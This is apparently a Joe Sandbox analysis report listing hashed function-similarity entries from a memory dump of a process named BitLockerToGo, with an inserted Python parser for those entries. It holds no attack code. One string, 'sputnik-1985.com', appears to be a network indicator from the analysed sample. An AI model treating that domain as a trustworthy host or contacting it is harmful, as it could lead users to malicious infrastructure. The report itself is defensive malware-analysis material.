                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: `ibc$PB
                                                                                                                                                                                                            • API String ID: 0-1987769102
                                                                                                                                                                                                            • Opcode ID: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                                                                                                                            • Instruction ID: d7af6ebc4ec7fa9aafc34c7092b5181dfb32356bb0cb9250f61f6585be71885b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 862237366183258BC324DF39DC412ABB7E2EFD5314F59893EE891D7390E77899018B89
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: f$xHLG
                                                                                                                                                                                                            • API String ID: 2994545307-1062749201
                                                                                                                                                                                                            • Opcode ID: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                                                                                                                            • Instruction ID: d2651cdac37472708b43d0abb75bf2b64163b131a76c60ca99435b560db9f8b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 092215756483418FD314CF24C8C172BB7E2ABC9314F19A93EE585A7392D679DC418B8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: H/'&$ur
                                                                                                                                                                                                            • API String ID: 0-969745386
                                                                                                                                                                                                            • Opcode ID: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                                                                                                                            • Instruction ID: 443a563da7a5e4d6bc490b1340c0ec2082c34ead57a9a2c43d9228df9cd59d8b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99322776B083608BD728CF29D85176BB7E2EBC5314F09857DE8899B391DB749C01C78A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 30$b
                                                                                                                                                                                                            • API String ID: 0-3051719697
                                                                                                                                                                                                            • Opcode ID: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                                                                                                                            • Instruction ID: 9d6171b0f8d729934fe615063e41a7396b25218e269f5ca015a4c9f4117884d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F134B5949340CBD724DF24C851BEBB3B1EFD5354F098A2EE48A4B391E7385841CB8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: sputnik-1985.com$~|
                                                                                                                                                                                                            • API String ID: 0-3200742978
                                                                                                                                                                                                            • Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
                                                                                                                                                                                                            • Instruction ID: 07f789514de0362c9278d2f25248cc3fff6a0dc72d81a8c8c11c8a6f1e2f7610
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
• Instruction Fuzzy Hash: 9902DEB114D3C18AD735CF25D4907EFBBE0EB96304F188A6DC4D96B252C3794906CB9A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: !-%.$i=+9
• API String ID: 0-3329930587
• Opcode ID: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
• Instruction ID: 5b9224ec03390a89ae17c2f1361fc79f648e0f3307ec9c5c46c31c27b4184649
• Opcode Fuzzy Hash: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
• Instruction Fuzzy Hash: B0D1D2B4A05214CFCF14CFA8D8D1AAEBBB1FF4A304F4445ADE415AB392EB389941CB55
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: #&J:$1?,s
• API String ID: 0-2217357408
• Opcode ID: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
• Instruction ID: dd87f522568f88e555f085d5caeae9b1fcb5bc55a8534498744cbd14fa8b2ca1
• Opcode Fuzzy Hash: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
• Instruction Fuzzy Hash: 9CD15975F08154CFDB08CF69E8D1AAE7BB2AF4A304F5845ADE4519B392D7398D01CB28
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
• Opcode ID: 64e8922db5e19fd8efc6a50d102b0bd740264c5242e44d91e2a004e5aead60ab
• Instruction ID: 1c4037f214bd03ac7378b9cacc3dd6070e77dcd69ce248976fcc19ea77d077a6
• Opcode Fuzzy Hash: 64e8922db5e19fd8efc6a50d102b0bd740264c5242e44d91e2a004e5aead60ab
• Instruction Fuzzy Hash: 9CD1A0B19083449FD720CF14D84575BBBE4ABD4308F14492EFA99AB3C2D779E908CB96
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 0v9t$qN
• API String ID: 0-941405136
• Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
• Instruction ID: 220aa0fee5a4e2dc26cf1b999887b7bccb6aee529e7354faf9f9a8d1f9f2e198
• Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
• Instruction Fuzzy Hash: 495147766053114BC7248A24C8917EF7693DBC1328F1B4A2DD8E59B3D2DB3DD84693CA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: @$MVWT
• API String ID: 0-308850327
• Opcode ID: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
• Instruction ID: 65c5c0bd10fcc527816f4646fa5217bc89ccf3aa808f0d29d6591c7bb2e007d1
• Opcode Fuzzy Hash: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
• Instruction Fuzzy Hash: D54113765193418BE704CF26C45036BB7E2EFDA305F59682ED4C2AB394DB7C8906CB4A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: siOk$siOk
• API String ID: 0-2545891108
• Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
• Instruction ID: 3c122c9db7ae0a256ae9501e17b53326d689da9f2a67ac00692780b2415a66a0
• Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
• Instruction Fuzzy Hash: AB21052951DAA04BCB36CB3D44D463EBBE65F97110B08897DDCE2C73CAC5249800D765
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: /:8*$x
• API String ID: 0-64667063
• Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
• Instruction ID: 1aa5775c3a72f552b4e6bc18da63457a51b737a705f76bfcd9083c664813a2f3
• Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
• Instruction Fuzzy Hash: E9014526A0D2B18AD301CA289980217FFD19B97700F184A99D4E6A7290C928DE05879A
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
• Instruction ID: 0c1059f1939fd580b755bdfd37faf5cc9b9fc08dac3a05aab46d246ee4cf4ccd
• Opcode Fuzzy Hash: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
• Instruction Fuzzy Hash: DC816976A083109FE320DF54DC817EBB7E5EBC4308F04453EFA8897291D77899068B96
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
• Instruction ID: 59fb6676a46cb5b2c496f07d3e0a494b9ac9741146e74fd95afe865ddde67d2c
• Opcode Fuzzy Hash: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
• Instruction Fuzzy Hash: C5513576A08310DFE7108F54EC8176BB7E0FBC4318F04497EFA8997291D7B999068B96
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
• Instruction ID: fc6a7fef22a05f64015de1e3c3639137bf4aa38685eff02bd3fad1d047ddcb30
• Opcode Fuzzy Hash: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
• Instruction Fuzzy Hash: 86D11672B083259FC714CE24E48076BB7E5AB84314F88896EEC9987382E778DC55C797
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: UR
• API String ID: 0-57707318
• Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
• Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
• Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
• Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: `ibc
                                                                                                                                                                                                            • API String ID: 2994545307-3725910391
                                                                                                                                                                                                            • Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                                                                                                                            • Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                                                                            • Opcode ID: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
                                                                                                                                                                                                            • Instruction ID: 263c9164548149212bab00621b26dadebf9e5cd68813eca0907a9d13e3b8c170
                                                                                                                                                                                                            • Opcode Fuzzy Hash: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B138712097859FD324CF28C88065BBBE0AFA9704F444E2DE5D997382D235EA18CB97
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                            • Opcode ID: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
                                                                                                                                                                                                            • Instruction ID: c6b100cd4e7dff2771264374d25d72747b80feda865de7cda43b8dec31ed639d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28813AB69042614FC7218E28C8513AFBBD1AB95324F19C27DECB99B392D2389C45D7D1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: :;8
                                                                                                                                                                                                            • API String ID: 0-370357910
                                                                                                                                                                                                            • Opcode ID: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                                                                                                                            • Instruction ID: 6cb1dbdef0645cb70831a53be780a797aaf24bd5e036ecf1d586697fe6f75162
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1751E0B1A483108BD714DF64C8126ABB7F2EF86318F18896DE4858B391E73AD506C75A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                            • API String ID: 0-2679148245
                                                                                                                                                                                                            • Opcode ID: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
                                                                                                                                                                                                            • Instruction ID: 9732de87ecb182f2271c988b8e40e3b004a85c04e183e157bc0133afcabd703d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D261C271618F808BD364CA3CC995256BAD2AF96334F188B6DE1FA8B7D2D778A4058701
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                            • Opcode ID: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                                                                                                                                            • Instruction ID: aad47e99843925c2084c89470e4a7e36356acbeb38c1926c5526f137fb7122d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351013151C7908AD7249B3984402EFBBD1AB97364F288E3FE9E5973D1D2398403974B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XL
                                                                                                                                                                                                            • API String ID: 0-2397331993
                                                                                                                                                                                                            • Opcode ID: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                                                                                                                            • Instruction ID: aa4fe24152c52a858318c677d95a7a0c2cd254ae91a73a2a1ffc4a6790d9ff85
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1419C38258351DFD3049F38E85066AB7E0FB4A315F0998BDD4C683361D37A99A5CB06
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                            • API String ID: 2994545307-1553575800
                                                                                                                                                                                                            • Opcode ID: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                                                                                                                            • Instruction ID: 2386a0911aa688524989a8340c90167ef89acf6b9e7633cd49b65fbe482c82f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31C371614645CFD728CF28C9517EBB7E6ABDA304F44853ED086CB351EB349444CB86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: SUQ
                                                                                                                                                                                                            • API String ID: 0-2651150828
                                                                                                                                                                                                            • Opcode ID: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                                                                                                                            • Instruction ID: 42c55c053425e0b0fbc475bcc9400de1786cc42e84e4724c7975db07e5bacbf3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE21B1706083818FC714CF28C4A07ABBFE2AFD6328F188A5DE5E547392D335C4498766
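Every entry above has the same shape: the memory dump it was taken from (the 0x400000 region of process 4, marked as PE-based), the snapshot file, the API and string the function references, and four hashes. To do anything useful with hundreds of them (join two reports on Opcode ID, list the functions that reference InitializeThunk, or confirm a text export parsed cleanly) the entries need to be turned into records first. The parser below is an added example written for this page, not Joe Sandbox code; its sample input is two entries copied verbatim from this report, with the extraction indentation removed. The field lengths it checks (64 hex characters for the IDs, 70 for the instruction fuzzy hash), the rule that Opcode ID equals Opcode Fuzzy Hash, and the rule that the first number of API String ID is 0 when API ID is empty are what every entry in this report shows; they are assumptions about the export format, not a documented specification.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: two entries copied from this report, indentation stripped.
SAMPLE_REPORT = """\
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: UR
• API String ID: 0-57707318
• Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
• Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
• Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
• Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: `ibc
• API String ID: 2994545307-3725910391
• Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
• Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
• Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
• Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86
"""

HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
SOURCE_RE = re.compile(r"^(?P<file>[^,]+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

@dataclass
class Entry:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    snapshot_file: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""

# Bullet label -> Entry attribute; labels not listed here are ignored, not errors.
FIELDS = {"Snapshot File": "snapshot_file", "API ID": "api_id", "String ID": "string_id",
          "API String ID": "api_string_id", "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
          "Opcode Fuzzy Hash": "opcode_fuzzy_hash", "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}

def parse_entries(text: str) -> List[Entry]:
    """An entry starts at a bare 'Strings' line; its bullets are 'label: value'. The value may be
    empty ('API ID:') or contain colons itself ('String ID: :;8'), so split only at the first colon."""
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":
            cur = Entry()
            entries.append(cur)
        elif cur is not None and line.startswith("•"):
            label, _, value = line[1:].partition(":")
            label, value = label.strip(), value.strip()
            if label == "Source File" and (m := SOURCE_RE.match(value)):
                cur.source_file, cur.offset = m["file"], int(m["off"], 16)
                cur.based_on_pe = m["pe"] == "true"
            elif label in FIELDS:
                setattr(cur, FIELDS[label], value)
    return entries

def check_entry(e: Entry) -> List[str]:
    """Sanity checks before pivoting on an entry. The lengths (64 hex chars for the IDs, 70 for the
    instruction fuzzy hash) and the Opcode ID == Opcode Fuzzy Hash rule are observed in this
    report and assumed here; they are not a documented format."""
    problems = []
    for name, n in (("opcode_id", 64), ("instruction_id", 64), ("instruction_fuzzy_hash", 70)):
        v = getattr(e, name)
        if len(v) != n or not HEX_RE.match(v):
            problems.append(f"{name}: expected {n} hex chars, got {v!r}")
    if e.opcode_id != e.opcode_fuzzy_hash:
        problems.append("opcode_id and opcode_fuzzy_hash differ")
    if not e.based_on_pe:
        problems.append("dump is not based on a PE image")
    return problems

def api_string_id_parts(e: Entry) -> Tuple[int, int]:
    """'API String ID' is '<a>-<b>'; in this report a is 0 exactly when 'API ID' is empty."""
    a, _, b = e.api_string_id.partition("-")
    return int(a), int(b)

def index_by_opcode(entries: List[Entry]) -> Dict[str, List[Entry]]:
    """Group entries by Opcode ID, the key on which two reports' entries can be joined."""
    idx: Dict[str, List[Entry]] = {}
    for e in entries:
        idx.setdefault(e.opcode_id, []).append(e)
    return idx
```

Feed it the text export of a whole report and `index_by_opcode` gives the set of Opcode IDs to intersect with another sample's report; `check_entry` catches entries that the text extraction mangled (truncated hashes, a missing `based on PE` field) before they pollute that comparison.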

Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: j
• API String ID: 0-2137352139
• Opcode ID: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                                                                                                                            • Instruction ID: f136246ef15f79f812ec07c1db461e86a52f6259eac92e8ccd6656980116f0fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 902124316083928AD3258F36945076BBBD5DFD7304F18889EE5C5AB382CB7884028B5A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
